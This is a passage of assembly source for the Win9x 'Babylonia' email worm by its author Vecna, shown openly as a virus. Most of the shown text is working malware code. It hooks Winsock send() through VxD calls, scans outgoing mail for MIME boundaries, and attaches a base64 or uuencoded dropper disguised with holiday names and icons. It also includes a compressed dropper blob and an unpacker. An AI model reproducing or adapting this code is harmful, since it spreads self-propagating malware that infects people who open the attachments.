call checkv jc @@again xchg edx, eax ret check endp rnd proc call @@2 dd 12345678h @@2: pop edx sub [edx], 12345678h org $-4 v2 dd 87654321h mov edx, [edx] xor [ebp+(ofs v2-ofs vcode)], edx ;get rnd number ret rnd endp checkv proc pusha push 4 pop ecx @@1: cmp al, ' ' jbe @@error cmp al, 0f0h ja @@error cmp al, '"' jz @@error cmp al, "'" jz @@error cmp al, "`" jz @@error cmp al, "\" jz @@error ror eax, 8 ;check for invalid characters loop @@1 ;for hlp script clc mov cl, 12h org $-1 @@error: stc popa ret checkv endp open proc call getatt mov [ebp+(ofs attr-ofs vcode)], eax sub ecx, ecx call setatt mov [ebp+(ofs fname-ofs vcode)], esi mov eax, 0D500h push 1h sub ecx, ecx mov ebx, 2022h pop edx call io mov [ebp+(ofs handle-ofs vcode)], eax ret open endp getsize proc mov eax, 0D800h __2_: jmp __2__ getsize endp close proc mov eax, 0D700h call __2_ mov ecx, 12345678h attr equ dwo $-4 mov esi, 12345678h fname equ dwo $-4 ;set old file attribute close endp setatt proc mov eax, 4301h __2__: jmp __2___ setatt endp getatt proc mov eax, 4300h __2___: jmp __2 getatt endp write proc mov eax, 0D601h jmp __2___ write endp read proc mov eax, 0D600h __2: mov ebx, 12345678h handle equ dwo $-4 read endp io proc call delta mov [ebp+(ofs eax_value-ofs vcode)], eax mov eax, 00400032h ;Ring0_IO xchg eax, [esp] push eax io endp vxd proc pop eax call delta mov wo [ebp+(ofs @@int-ofs vcode)], 20cdh sub eax, ebp add eax, -((ofs @@jmp-ofs vcode)+4) mov [ebp+(ofs @@jmp-ofs vcode)], eax pop dwo [ebp+(ofs @@address-ofs vcode)] ;dynamic VxDCall building mov eax, 12345678h eax_value equ dwo $-4 @@int: int 20h @@address dd 0 db 0e9h @@jmp dd 0 vxd endp bound_ db 'OUNDARY="' bound_sz = $-ofs bound_ db 0 rva2raw proc push esi push ecx push ebx lea esi, [esp+section+(4*4)] ;first section movzx ecx, wo [esp+pe_hdr+6+(4*4)] @@section: mov ebx, eax sub ebx, [esi+12] cmp [esi+8], ebx jae @@found ;point inside section sub esi, -40 loop @@section sub ebx, ebx ;signal error jmp @@error @@found: add ebx, 
[esi+20] ;convert to raw @@error: mov eax, ebx pop ebx pop ecx pop esi ret rva2raw endp check_size proc test eax, eax jz @@error cmp eax, 2*1024*1024 jae @@error ;bigger than 2mb cmp eax, 8*1024 jbe @@error ;smaller than 4kb sub edx, edx push 17 pop ecx ;if((fsize mod 17) = 15) div ecx ;lexo32 ;-) sub edx, 15 db 066h, 0b8h ;mov ax, ? @@error: sub eax, eax ret check_size endp pstart equ this byte ;wsock32.dll code... dd 0 db 'C:\_' driver db 8 dup (0) ;drivername db '.---', 0 send proc call init2 mov eax, 12345678h _send equ dwo $-4 jmp eax ;jmp to hmem send send endp init2 proc cld pusha call @@delta @@delta: pop ebp add ebp, -(ofs @@delta-ofs pstart) ;get delta in wsock32.dll mov ebx, ebp lea edi, [ebx+(ofs driver-ofs pstart)] push 8 pop ecx @@byte: rol ebx, 4 mov al, bl and al, 01111b ;convert address to filename add al, 'A' stosb loop @@byte add ebx, 4 push ebx db 0b8h _getfattr dd 0 ;call backdoor call eax mov eax, 90909090h lea edi, [ebp+((ofs send-ofs pstart))] stosd ;clean calls to install stosb mov eax, [ebp] ;get ring0 interface code test eax, eax jz @@damaged ;cant get the interface mov [ebp+(ofs _send-ofs pstart)], eax ;set jmps to my hmem handlers @@damaged: popa ret init2 endp pend equ this byte include unpack.inc ScanVxd proc pusha mov edi, [ebx+0C0000018h] ;Control_Proc_0 @@page: lea ecx, [edi+4] ;check presence for test ecx, 00000FFFh jz @@check ;to each new page encountered @@mov: inc edi cmp [edi], esi ;B8 jne @@page cmp by [edi-1], 0B8h jne @@page mov dwo [edi], -1 ;R0_xxx <-- 0xFFFFFFFF jmp @@page @@check: pusha sub esp, 28 mov esi, esp push 28 push esi ;esi = MEMORY_BASIC_INFO push ecx push 00010134h call vxd ;VMMcall PageQuery bt dwo [esi+10h], 3 ;mbi_state & MEM_COMMIT lea esp, [esp+4*3+28] popa jc @@mov ;will not fault? 
popa ret ScanVxd endp IF DEBUG EQ TRUE dropname db 'C:\GOAT.EXE', 0 ELSE dropname db 'C:\BABYLONIA.EXE', 0 ENDIF myname dd 0 mem_temp dd 0 mem dd 0 sent dd 0 uudropper dd 0 uusize dd 0 b64dropper dd 0 b64size dd 0 my_send proc call init pusha call delta mov esi, [esp+(8*4)+(1*4)+4] ;send() buffer db 0b9h socket_out dd 0 ;we're monitoring a specific socket? jecxz @@all cmp [esp+(8*4)+(1*4)+0], ecx ;if so, then make sure is our je @@monitor jmp @@done @@all: cmp [esi], 'ATAD' ;email is being send! jne @@done mov eax, [esp+(8*4)+(1*4)+0] ;monitor this socket only now mov [ebp+(ofs socket_out-ofs vcode)], eax sub eax, eax mov [ebp+(ofs boundary-ofs vcode)], eax ;init MIME fieldz mov [ebp+(ofs sent-ofs vcode)], eax jmp @@done @@monitor: mov ecx, [esp+(8*4)+(1*4)+8] ;size mov edi, esi mov al, '.' ;search . push ecx @@cont_dot: repne scasb ;not end_of_email yet jne @@no_dot ;so, check for MIME cmp dwo [edi-2], 0a0d2e0ah jne @@cont_dot ;make sure is the end_of_email sign pop ecx ;ecx=size of buffer call uu_send sub eax, eax ;ready to infect next email mov [ebp+(ofs socket_out-ofs vcode)], eax jmp @@done ;send the . @@no_dot: pop ecx dec ecx ;monitor MIME emailz dec ecx dec ecx ;size-3, since we load DWORDs test ecx, ecx js @@done ;buffer smaller than 2, exit! @@scan: push ecx lodsd dec esi dec esi dec esi push esi and eax, not 20202020h ;eax=upcase of 1st 4 letterz db 0bah boundary dd 0 test edx, edx ;we already found the boundary? jnz @@boundary_found sub eax, 'NUOB' jnz @@bogus ;maybe a boundary? 
lea edi, [ebp+(ofs bound_-ofs vcode)] @@loop_1: cmp by [edi], ah je @@done_1 lodsb cmp al, 'a' jb @@up cmp al, 'z' ;check string ja @@up and al, not 20h @@up: inc edi not al cmp by [edi-1], al je @@loop_1 @@done_1: jne @@bogus mov edi, [ebp+(ofs mem-ofs vcode)] ;copy MIME boundary to buffer mov [ebp+(ofs boundary-ofs vcode)], edi @@next_b: lodsb cmp al, '"' je @@copied stosb jmp @@next_b @@copied: sub eax, eax ;now we have all we need for stosd ;a perfect send :) jmp @@bogus @@boundary_found: push esi dec esi dec ecx sub eax, eax ;search for boundary @@match: lodsb inc edx cmp by [edx], ah je @@is_boundary cmp by [edx], al ;compare stringz je @@match @@is_boundary: xchg edi, esi ;edi=end of boundary+1 pop esi jne @@bogus ;end reached and all match? cmp al, '-' jne @@bogus scasb ;found last boundary! jne @@bogus pop eax ;fix stack mov [esp], edi mov wo [edi-2], 0A0Dh ;turn to normal boundary sub edi, [esp+(8*4)+(1*4)+4+4] ;subtract buffer address xchg [esp+(8*4)+(1*4)+8+4], edi ;new size mov [ebp+(ofs eax_value2-ofs vcode)], edi ;save old for return push dwo [esp+(8*4)+(1*4)+8+4] ;size push dwo [esp+(8*4)+(1*4)+8+4] ;buffer call safesend pop edi ;interception point mov wo [edi-2], '--' ;restore user buffer mov [ebp+(ofs eax_value2-ofs vcode)], eax jc @@error call uu_send mov eax, [ebp+(ofs eax_value2-ofs vcode)] ;how much they want send mov ebx, [esp+(8*4)+(1*4)+8] ;how much we already send sub eax, ebx jz @@gran_finale ;done mov [esp+(8*4)+(1*4)+8], eax ;send rest add [esp+(8*4)+(1*4)+4], ebx ;starting from last send byte push dwo [esp+(8*4)+(1*4)+8] ;size push dwo [esp+(8*4)+(1*4)+8] ;buffer call safesend ;send the remainder of user buffer jc @@error @@gran_finale: mov edi, [ebp+(ofs boundary-ofs vcode)] mov esi, edi @@next1: lodsb test al, al jnz @@next1 ;search end xchg edi, esi dec edi add al, '-' stosb ;make last boundary stosb sub edi, esi ;calculate the size push edi ;size push esi call safesend ;send last boundary @@error: popa db 0b8h eax_value2 dd 0 
;return no error ret 4*4 @@bogus: pop esi pop ecx dec ecx jnz @@scan ;bahh... to far to a loop @@done: popa mov eax, 12345678h oldsend equ dwo $-4 jmp eax my_send endp script db 'Content-Type: application/octet-stream; name="', 1, '"', 13, 10 db 'Content-Disposition: attachment; filename="', 1, '"', 13, 10 db 'Content-Transfer-Encoding: base64', 13, 10, 13, 10 db 0 script_sz = $-ofs script uu_send proc pusha sub eax, eax cmp [ebp+(ofs sent-ofs vcode)], eax jne @@already mov edi, [ebp+(ofs boundary-ofs vcode)] cmp edi, eax je @@skip_header add edi, 100h ;work after boundary push edi lea esi, [ebp+(ofs script-ofs vcode)] @@expand: lodsb not al test al, al jz @@send_header cmp al, 1 jnz @@name call ninsert ;insert exe name db 0b0h @@name: stosb jmp @@expand @@send_header: pop esi sub edi, esi push edi ;size push esi ;buffer call safesend ;send mime header jc @@fuxkx mov edi, [ebp+(ofs b64size-ofs vcode)] mov esi, [ebp+(ofs b64dropper-ofs vcode)] jmp @@block @@skip_header: mov edi, [ebp+(ofs uusize-ofs vcode)] mov esi, [ebp+(ofs uudropper-ofs vcode)] @@block: mov eax, 4*1024 ;block size=4kb cmp eax, edi jb @@low mov eax, edi ;send the remainder @@low: push eax ;size push esi ;buffer call safesend jc @@fuxkx add esi, eax sub edi, eax jnz @@block ;blockz left? @@fuxkx: mov [ebp+(ofs sent-ofs vcode)], ebp @@already: popa ret uu_send endp init proc pusha cld sub eax, eax call delta cmp [ebp+(ofs mem-ofs vcode)], eax jne @@inited ;we already inited our dropper? 
        mov eax, [ebp+(ofs mem_temp-ofs vcode)]
        mov [ebp+(ofs mem-ofs vcode)], eax
        test eax, eax
        jz @@inited
        push eax
        call @@over
        include dropper.inc
@@over:
        call _aP_depack_asm  ;unpack dropper data
        add esp, -8*2
        push esp
        db 0b8h
_gsystime dd 0
        call eax
        mov bl, [esp+(1*2)]  ;bh=month
        add esp, 8*2
        push 6
        lea esi, [ebp+(ofs dates-ofs vcode)]
        lea ecx, [ebp+(ofs name0-ofs vcode)]
        mov [ebp+(ofs myname-ofs vcode)], ecx
        pop ecx
@@next_date:
        lodsw
        cmp ah, bl
        je @@is
        cmp bl, al
        jne @@nope  ;this holiday isnt this month
@@is:
        pusha
        mov edi, [ebp+(ofs mem-ofs vcode)]
        add edi, icon  ;where icon should go in dropper
        mov esi, edi
        add esi, (ofs coelho-icon)  ;first icon
        mov eax, 1152
        xchg eax, ecx  ;eax=count ecx=size icon
        dec eax
        lea edx, [ebp+(ofs names-ofs vcode)]
        mov edx, [edx+(eax*4)]
        add edx, ebp
        mov [ebp+(ofs myname-ofs vcode)], edx  ;get dropper name
        cdq
        mul ecx  ;count*size+base=new icon
        add esi, eax
        rep movsb  ;install new icon
        popa
@@nope:
        loop @@next_date  ;check next date
        push 2
        lea esi, [ebp+(ofs dropname-ofs vcode)]
        pop ecx
        call r3_open
        jz @@fux0r
        push DROPPER_SIZE
        mov esi, [ebp+(ofs mem-ofs vcode)]
        pop ecx
        call r3_write  ;write clean dropper
        call r3_close
        push 3
        lea esi, [ebp+(ofs dropname-ofs vcode)]
        pop ecx
        call r3_open
        jz @@fux0r1
        call r3_seof  ;get new dropper size
        cmp eax, DROPPER_SIZE
        je @@fux0r2  ;was infected?
        push eax
        call r3_ssof
        mov edi, [ebp+(ofs mem-ofs vcode)]
        mov ecx, [esp]
        lea eax, [edi+ecx]
        push edi
        push eax
        call r3_read  ;read infected dropper
@@fux0r2:
        call r3_close
@@fux0r1:
        lea eax, [ebp+(ofs dropname-ofs vcode)]
        push eax
        db 0b8h
_fdelete dd 0
        call eax
        pop edi  ;edi=uuencode buffer
        mov esi, [esp]  ;esi=image
        mov ecx, [esp+4]  ;ecx=size
        call uuencode
        call delta
        mov [ebp+(ofs uudropper-ofs vcode)], edi
        mov [ebp+(ofs uusize-ofs vcode)], ecx
        pop esi  ;esi=image
        lea edi, [edi+ecx]
        pop eax  ;eax=size
        call BASE64
        mov [ebp+(ofs b64dropper-ofs vcode)], edi
        mov [ebp+(ofs b64size-ofs vcode)], ecx
        lea eax, [ebp+(ofs wsock-ofs vcode)]
        push eax
        db 0b8h
_getmhandle dd 0
        call eax
        mov edi, [ebp+(ofs _getproc-ofs vcode)]  ;eax=wsokc32 base
        call @@112
        db 'WSAGetLastError', 0
@@112:
        push eax
        call edi
        mov [ebp+(ofs _WSAGetLastError-ofs vcode)], eax
        jmp @@inited
@@fux0r:
        sub eax, eax
        mov [ebp+(ofs mem-ofs vcode)], eax
@@inited:
        popa
        ret
init endp

decript_names proc
        pusha
        call delta
        lea edi, [ebp+(ofs name0-ofs vcode)]
        push name_sz
        pop ecx
        mov esi, edi
@@999:
        lodsb
        not al  ;crypt/decrypt
        stosb
        loop @@999
        popa
        ret
decript_names endp

ninsert proc
        pusha
        call decript_names
        mov esi, [ebp+(ofs myname-ofs vcode)]
@@next:
        lodsb
        stosb
        test al, al
        jnz @@next
        dec edi
        mov eax, not 'EXE.'
        not eax
        stosd
        mov [esp], edi
        call decript_names
        popa
        ret
ninsert endp

dates equ this byte
        db 06, 07  ; BABILONIA - US flag
        db 12, 12  ; Christmas - Santa Claus
        db 04, 04  ; Easter - egg
        db 01, 01  ; Three Kings - Jesus
        db 10, 11  ; Halloween - pumpkin
        db 03, 03  ; Easter 2 - rabbit

name0 db 'I-WATCH-U', 0  ;default name
name1 db 'BABILONIA', 0
name2 db 'X-MAS', 0
name3 db 'SURPRISE!', 0
name4 db 'JESUS', 0
name5 db 'BUHH', 0
name6 db 'CHOCOLATE', 0
name_sz = $-ofs name0

names equ this byte
        dd (ofs name6-ofs vcode)
        dd (ofs name5-ofs vcode)
        dd (ofs name4-ofs vcode)
        dd (ofs name3-ofs vcode)
        dd (ofs name2-ofs vcode)
        dd (ofs name1-ofs vcode)
        dd 0

r3_open proc
        sub eax, eax
        push eax
        push 22h
        push ecx
        push eax
        push eax
        push 0c0000000h
        push esi
        mov eax, 12345678h
_openfile equ dwo $-4
        call eax  ;CreateFileA
        mov [ebp+(ofs r3handle-ofs vcode)], eax
        inc eax
        ret
r3_open endp

r3_close proc
        push 12345678h
        org $-4
r3handle dd 0
        mov eax, 12345678h
_closehandle equ dwo $-4
        call eax  ;CloseHandle
        ret
r3_close endp

r3_write proc
        push 0
        call @@1
        dd 0
@@1:
        push ecx
        push esi
        push dwo [ebp+(ofs r3handle-ofs vcode)]
        mov eax, 12345678h
_writefile equ dwo $-4
        call eax  ;WriteFile
        ret
r3_write endp

r3_read proc
        push 0
        call @@1
        dd 0
@@1:
        push ecx
        push edi
        push dwo [ebp+(ofs r3handle-ofs vcode)]
        mov eax, 12345678h
_readfile equ dwo $-4
        call eax  ;ReadFile
        ret
r3_read endp

r3_ssof proc
        push 0
        db 66h,0b8h
r3_seof proc
        push 2
        push 0
        push 0
        push dwo [ebp+(ofs r3handle-ofs vcode)]
        mov eax, 12345678h
_seekfile equ dwo $-4
        call eax
        ret
r3_seof endp
r3_ssof endp

;UUENCODE
;ESI=Data to encode
;EDI=Buffer
;ECX=Size of data
uuencode proc
        cld
        push edi
        push esi
        push ecx
        mov eax, 065620A0Dh
        stosw
        stosd
        mov eax, not ' nig'
        not eax
        stosd
        mov eax, not ' 446'
        not eax
        stosd
        call ninsert  ;insert dropper name
        mov ax, 0A0Dh
        stosw
        mov eax, [esp]  ;eax=size
        cdq
        push 45
        pop ebx
        div ebx  ;dl=rest in last line
        mov ecx, eax  ;ecx=number of lines
        pop ebp  ;esi=start of data
        pop esi
        add ebp, esi  ;ebp=end of data
@@line:
        push ecx
        mov al, "M"
        ;start of line
        stosb
        push 15
        pop ecx  ;read 15*3 => write 15*4
@@octet:
        call getbyte
        shr al, 2
        call convert  ;1st char
        shl al, 4
        and al, 00110000b
        mov bh, al
        call getbyte
        shr al, 4
        and al, 00001111b
        or al, bh
        call convert  ;2nd char
        shl al, 2
        and al, 11111100b
        mov bh, al
        call getbyte
        shr al, 6
        and al, 00000011b
        or al, bh
        call convert  ;3th char
        call convert  ;4th char
        loop @@octet
        mov ax, 0A0Dh
        stosw
        pop ecx
        loop @@line  ;do next line
        mov eax, edx
        test al, al
        jz @@end
        add al, 20h  ;do remainder
        stosb
        xor eax, eax
        mov al, dl
        xor edx, edx
        xor ecx, ecx
        push 3
        pop ebx
        div ebx
        mov ecx, eax
        test edx, edx
        jz @@no_rest
        inc cx  ;octets to make
@@no_rest:
        push 1  ;is last line
        sub edx, edx  ;with no rest
        jmp @@octet
@@end:
        mov eax, 0650A0D60h  ;"end"
        stosd
        mov eax, 00A0D646Eh
        stosd
        shr eax, 16  ;cr+lf
        stosw
        pop ecx
        sub edi, ecx
        xchg edi, ecx
        ret
uuencode endp

wsock db 'WSOCK32.DLL', 0

convert proc
        and al, 00111111b
        jnz @@0
        add al, 40h
@@0:
        add al, 20h
        stosb
        mov al, ah
        ret
convert endp

getbyte proc
        cmp esi, ebp  ;end of buffer?
        jne @@load
        xor al, al
        db 0b4h  ;skip LODSB
@@load:
        lodsb
        mov ah, al  ;backup
        ret
getbyte endp

protect proc
        inc ecx
        add ecx, 4096  ;tnz again to z0mbie!
        shr ecx, 12
        test ebx, 4095
        jnz @@forget
        shr ebx, 12
        push 0
        push not (00020000h+00040000h)  ;not writeable+user
        push ecx
        push ebx
        push 00010133h  ;PageModifyPermissions
        call vxd
        add esp, 4*4
@@forget:
        ret
protect endp

safesend proc
        pusha
@@retry:
        mov eax, [esp+4+(8*4)]
        mov ecx, [esp+8+(8*4)]
        push 0
        push ecx  ;size
        push eax  ;buffer
        push dwo [ebp+(ofs socket_out-ofs vcode)]
        call [ebp+(ofs oldsend-ofs vcode)]
        mov ecx, eax
        inc ecx
        jnz @@done
        db 0b8h
_WSAGetLastError dd 0
        call eax
        sub eax, 10035  ;EWOULDBLOCK?
        jz @@retry
        stc  ;error
        db 0b1h
@@done:
        clc
        mov [esp+(7*4)], eax
        popa
        ret 2*4
safesend endp

;esi=input
;edi=output
;eax=size
BASE64 proc
        cld
        push edi
        push 3
        call @@trans
trans_table = $
        db 'A','B','C','D','E','F','G','H','I','J'
        db 'K','L','M','N','O','P','Q','R','S','T'
        db 'U','V','W','X','Y','Z','a','b','c','d'
        db 'e','f','g','h','i','j','k','l','m','n'
        db 'o','p','q','r','s','t','u','v','w','x'
        db 'y','z','0','1','2','3','4','5','6','7'
        db '8','9','+','/'
chars dd ?  ;character counter
@@trans:
        pop ebx
        push (ofs chars-ofs trans_table)
        pop ecx
@@1:
        not by [ebx+ecx-1]  ;crazy, isnt? ;)
        loop @@1  ;now, imagine what i can do if i wasnt stoned all time
        pop ecx
        cdq
        mov dwo [ebx+ecx+((ofs chars-ofs trans_table)-3)], edx  ;tricky ;)
        div ecx
        mov ecx, eax
        push edx
@@loop:
        lodsd
        dec esi  ;edx=original
        mov edx, eax  ;edx=work copy
        call Temp
        call CODE64Block3
        call CODE64Block4
        loop @@loop
        pop ecx  ;get rest
        jecxz @@done
        lodsd
        dec ecx
        jz @@rest1
        movzx edx, ax  ;use only 2 bytes
        call Temp
        call CODE64Block3
        jmp @@end
@@rest1:
        movzx edx, al  ;use 1 byte only
        call Temp
        inc ecx
        inc ecx
@@end:
        mov al, '='
        rep stosb
@@done:
        mov eax, 0A0D0A0Dh
        stosd
        push (ofs chars-ofs trans_table)
        pop ecx
@@2:
        not by [ebx+ecx-1]
        loop @@2
        pop ecx
        sub edi, ecx  ;edi=buffer
        xchg ecx, edi  ;ecx=size
        ret
BASE64 endp

Temp proc
        call CODE64Block1  ;little optimizing routine
        call CODE64Block2
        ret
Temp endp

CODE64Block1:
        mov eax, edx
        shr eax, 02h
process3:
        jmp process
CODE64Block2:
        mov eax, edx
        shl al, 04h
        shr ah, 04h
process2:
        or al, ah  ;chained jmps
        jmp process3  ;another "why make it easy?"
        ;(c) Vecna ;)
CODE64Block3:
        mov eax, edx
        shr eax, 08h
        shl al, 02h
        shr ah, 06h
        jmp process2
CODE64Block4:
        mov eax,edx
        shr eax,10h
process:
        and al,00111111b
        xlatb
        stosb
        mov eax, dwo [ebx+(ofs chars-ofs trans_table)]
        inc eax
        mov dwo [ebx+(ofs chars-ofs trans_table)], eax
        pusha
        push 0000004Ch
        pop ecx
        cdq
        div ecx
        test edx, edx
        popa
        jnz @@noline
        mov ax, 0A0Dh
        stosw
@@noline:
        ret

        align 4
vend equ this byte
        db 'EOV', 0
_VIRUS ends
end main
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BABYLON.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOST.INC]ÄÄÄ
_TEXT segment dword use32 public 'CODE'
main proc
        call init001
        push 0
        push ofs caption
        push ofs msg
        push 0
temp1 equ $
        call virusmain
        extrn MessageBoxA:PROC
        call MessageBoxA
        push 0
        extrn ExitProcess:PROC
        call ExitProcess
main endp

init001 proc
        mov esi, ofs hlp1_s
        mov edi, esi
        mov ecx, hlp1_sz
@@1:
        lodsb
        not al
        stosb
        loop @@1
        mov esi, ofs bound_
        mov edi, esi
        mov ecx, bound_sz
@@2:
        lodsb
        not al
        stosb
        loop @@2
        mov esi, ofs script
        mov edi, esi
        mov ecx, script_sz
@@3:
        lodsb
        not al
        stosb
        loop @@3
        mov esi, ofs name0
        mov edi, esi
        mov ecx, name_sz
@@4:
        lodsb
        not al
        stosb
        loop @@4
        mov esi, ofs trans_table
        mov edi, esi
        mov ecx, (ofs chars-ofs trans_table)
@@5:
        lodsb
        not al
        stosb
        loop @@5
        ret
init001 endp
_TEXT ends

_DATA segment dword use32 public 'DATA'
IF DEBUG EQ TRUE
caption db 'Vecna virus (DEBUG)', 0
ELSE
caption db 'Vecna virus', 0
ENDIF
msg db 'You just released a Win9x virus!', 0
_DATA ends
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOST.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UPDATER.INC]ÄÄÄ
;Compressed WWW Updater
;(C) Vecna
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UPDATER.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UNPACK.INC]ÄÄÄ
;***************************************************************
;* aPLib v0.22b - the smaller the better :)                    *
;* WASM & TASM assembler depacker                              *
;*                                                             *
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved       *
;***************************************************************
_aP_depack_asm:
        push ebp
        mov ebp, esp
        pushad
        push ebp
        mov esi, [ebp + 8]  ; C calling convention
        mov edi, [ebp + 12]
        cld
        mov dl, 80h
literal:
        movsb
nexttag:
        call getbit
        jnc literal
        xor ecx, ecx
        call getbit
        jnc codepair
        xor eax, eax
        call getbit
        jnc shortmatch
        mov al, 10h
getmorebits:
        call getbit
        adc al, al
        jnc getmorebits
        jnz domatch_with_inc
        stosb
        jmp short nexttag
codepair:
        call getgamma_no_ecx
        dec ecx
        loop normalcodepair
        mov eax,ebp
        call getgamma
        jmp short domatch
shortmatch:
        lodsb
        shr eax, 1
        jz donedepacking
        adc ecx, 2
        mov ebp, eax
        jmp short domatch
normalcodepair:
        xchg eax, ecx
        dec eax
        shl eax, 8
        lodsb
        mov ebp, eax
        call getgamma
        cmp eax, 32000
        jae domatch_with_2inc
        cmp eax, 1280
        jae domatch_with_inc
        cmp eax, 7fh
        ja domatch
domatch_with_2inc:
        inc ecx
domatch_with_inc:
        inc ecx
domatch:
        push esi
        mov esi, edi
        sub esi, eax
        rep movsb
        pop esi
        jmp short nexttag
getbit:
        add dl, dl
        jnz stillbitsleft
        mov dl, [esi]
        inc esi
        adc dl, dl
stillbitsleft:
        ret
getgamma:
        xor ecx, ecx
getgamma_no_ecx:
        inc ecx
getgammaloop:
        call getbit
        adc ecx, ecx
        call getbit
        jc getgammaloop
        ret
donedepacking:
        pop ebp
        sub edi, [ebp + 12]
        mov [ebp - 4], edi  ; return unpacked length in eax
        popad
        pop ebp
        ret 4*2
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UNPACK.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[DROPPER.INC]ÄÄÄ
;Compressed Dropper&Icon data
;(C) Vecna
dropper equ 0
coelho equ dropper+6144
hallwen equ coelho+1152
jesus equ hallwen+1152
ovo equ jesus+1152
santa equ ovo+1152
babylonia equ santa+1152
icon equ 12c8h
0B9h, 06Ah, 082h, 022h, 044h, 0ECh, 09Ah, 040h db 02Bh, 0F6h, 01Fh, 0A9h, 021h, 0A4h, 040h, 04Ah db 021h, 05Ah, 091h, 020h, 016h, 019h, 023h, 01Dh db 09Ah, 002h, 0B4h, 0C3h, 0A4h, 060h, 0ADh, 09Dh db 0B8h, 048h, 003h, 0A7h, 008h, 0D3h, 085h, 07Dh db 020h, 0C2h, 01Bh, 084h, 09Dh, 05Ah, 0A9h, 01Ch db 040h, 053h, 053h, 027h, 004h, 09Fh, 0ABh, 080h db 0EDh, 043h, 04Dh, 044h, 0A9h, 011h, 080h, 052h db 045h, 064h, 06Ah, 0C0h, 0F2h, 094h, 0E1h, 09Bh db 018h, 0BDh, 0D7h, 01Fh, 094h, 082h, 0DAh, 028h db 065h, 067h, 035h, 018h, 079h, 01Fh, 04Dh, 020h db 04Dh, 001h, 044h, 020h, 0CAh, 0C0h, 089h, 007h db 01Ch, 071h, 0AFh, 020h, 0B7h, 0B1h, 035h, 0F6h db 03Dh, 020h, 0FAh, 03Eh, 0D2h, 023h, 03Dh, 0D0h db 049h, 0CDh, 0F2h, 0C7h, 004h, 0A9h, 05Dh, 035h db 004h, 06Dh, 08Dh, 049h, 0AEh, 0E6h, 09Eh, 010h db 0FDh, 05Fh, 0CDh, 06Bh, 0CDh, 036h, 060h, 0B1h db 070h, 07Ah, 0C5h, 0D2h, 078h, 0FCh, 00Fh, 0C5h db 098h, 0F8h, 007h, 05Dh, 004h, 0F1h, 01Eh, 03Fh db 0F0h, 088h, 008h, 00Fh, 0E0h, 03Eh, 0A0h, 0C0h db 043h, 003h, 0A5h, 019h, 01Ch, 009h, 00Fh, 046h db 028h, 061h, 053h, 01Fh, 004h, 0E3h, 0FCh, 020h db 099h, 0FEh, 06Ch, 07Fh, 009h, 0B7h, 0E0h, 0E8h db 0F0h, 0A4h, 004h, 078h, 003h, 0D5h, 074h, 004h db 036h, 0F8h, 04Ch, 0EBh, 0E5h, 03Bh, 06Fh, 027h db 0F1h, 048h, 01Fh, 0C5h, 042h, 0C5h, 06Ch, 00Eh db 0C3h, 042h, 013h, 019h, 08Fh, 047h, 048h, 04Ah db 021h, 09Ch, 065h, 0A3h, 0E7h, 013h, 01Dh, 03Fh db 046h, 0D6h, 040h, 0E1h, 005h, 027h, 021h, 038h db 0D3h, 06Eh, 038h, 03Eh, 01Bh, 041h, 06Ah, 08Ah db 00Ch, 021h, 056h, 0DBh, 03Eh, 034h, 0A5h, 066h db 080h, 009h, 0D5h, 041h, 063h, 0A6h, 0F3h, 0D4h db 02Dh, 02Fh, 0A5h, 079h, 041h, 0ABh, 07Fh, 08Eh db 0CAh, 020h, 0B8h, 0C3h, 0DCh, 023h, 0D3h, 055h db 0BEh, 020h, 0DAh, 092h, 05Ah, 096h, 020h, 0E9h db 00Fh, 050h, 005h, 01Eh, 0A2h, 020h, 04Ah, 002h db 095h, 020h, 091h, 042h, 055h, 0DAh, 049h, 020h db 0E2h, 015h, 0B6h, 028h, 042h, 0ABh, 020h, 053h db 0D1h, 020h, 0A5h, 037h, 019h, 08Ah, 020h, 06Dh db 03Eh, 05Fh, 020h, 06Ah, 080h, 05Fh, 04Eh, 011h db 
